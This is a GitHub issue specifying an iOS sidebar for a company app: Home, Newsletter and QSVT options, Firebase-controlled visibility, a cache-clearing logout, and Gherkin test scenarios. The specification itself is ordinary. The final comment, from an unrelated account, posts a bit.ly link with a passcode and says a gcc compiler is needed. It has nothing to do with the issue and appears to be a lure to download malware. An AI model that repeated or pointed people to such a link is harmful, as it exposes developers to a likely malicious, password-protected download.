### ISSUE TITLE
Front - V1 - iOS - Sidebar options (le truc de gauche)

### ISSUE THREAD

**Issue by NyraSama** [XPEHO/XpeApp#146]
**Priority:** High

### **_What are the user's needs ?_**

**As** a user,
**I want to** access different sections of the application via a sidebar located on the left side
**In order to** easily navigate between different sections of the application and manage my session

**Context :** In the company's daily management application, we will integrate a sidebar on the left side to allow users to easily access different sections of the application. For version 1 (V1), the sidebar will contain the following options in this order: Home, Newsletter, and QSVT. Users will also have the ability to log out by clicking the logout button at the bottom of the sidebar, which will clear the application cache and redirect the user to the login page.
___

### **Business Rules**
- Displaying the Sidebar:
   * The sidebar must contain the following options in this order:
       -Home
       -Newsletter
       -QSVT
   * The display of the sidebar options visible to the user will be authorized by the admin via Firebase.

- Interacting with the Sidebar:
   * The user can open the sidebar by clicking on the "burger" icon at the top left of the screen.
   * When the user clicks on an option in the sidebar, it will close and the corresponding page will be displayed.
   * The sidebar must be accessible and functional on all types of devices (computer, tablet, smartphone).

- Logout:
   * A logout button must be located at the bottom of the sidebar.
   * When clicking the logout button, the application must clear the cache and redirect the user to the login page.
   * The logout must be instantaneous and secure, ensuring that all session data is cleared.

- UI/UX:
   * Implement from Yaki_UI package the "burger" icon at the top left of the screen to open the sidebar.
   * Ensure the sidebar automatically closes when an option is selected.
   * The transition between pages must be smooth and without noticeable delay.
___
### **Technical Data**
Feature Flipping via Firebase:
- Use Firebase to manage feature flipping and control access to different sidebar options.
- The admin can enable or disable access to each option individually for different users or user groups.

Cache Management:
- Clear the application cache upon user logout.
- Use secure techniques for cache management to protect sensitive data.
___

### **Acceptance criteria and Test cases :**
**Feature: Sidebar Navigation**

**Scenario: Displaying the sidebar options**
  **Given** the user is logged into the application
  **When** the user opens the sidebar
  **Then** the sidebar displays the options in the following order:
    | Option       |
    | Home        |
    | Newsletter|
    | QSVT         |
  **And** the options are enabled based on the feature flipping settings in Firebase

**Scenario: Opening the sidebar**
  **Given** the user is on any page of the application
  **When** the user clicks the "burger" icon in the top left corner
  **Then** the sidebar opens

**Scenario: Closing the sidebar by selecting an option**
  **Given** the sidebar is open
  **When** the user clicks on the "Home" option
  **Then** the sidebar closes
  **And** the "Home" page is displayed

**Scenario: Closing the sidebar by selecting another option**
  **Given** the sidebar is open
  **When** the user clicks on the "Newsletter" option
  **Then** the sidebar closes
  **And** the "Newsletter" page is displayed

**Scenario: Closing the sidebar by selecting another option**
  **Given** the sidebar is open
  **When** the user clicks on the "QSVT" option
  **Then** the sidebar closes
  **And** the "QSVT" page is displayed

**Scenario: User logout**
  **Given** the sidebar is open
  **When** the user clicks the "Logout" button at the bottom of the sidebar
  **Then** the application clears the cache
  **And** the user is redirected to the login page

**Scenario: Access control via feature flipping**
  **Given** the user is logged into the application
  **When** the admin configures access settings in Firebase
  **Then** the sidebar displays options based on the admin's settings
    | Option        | Visibility |
    | Home         | true       |
    | Newsletter | false      |
    | QSVT          | true       |

- [ ] Documentation
- [ ] Integration Tests
- [ ] Unit Tests
- [ ] UI component Tests
___

### **Which UI / UX elements do we need to take into account ?**

https://www.figma.com/design/OVzLl0Q33rnBpodLYixil1/Application-Xpeho?node-id=1720-5565&t=ZlJfEotVdIfdatpd-4
![Image](https://github.com/user-attachments/assets/2d2217a0-1a5e-4e5b-b092-df838d4bd967)

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
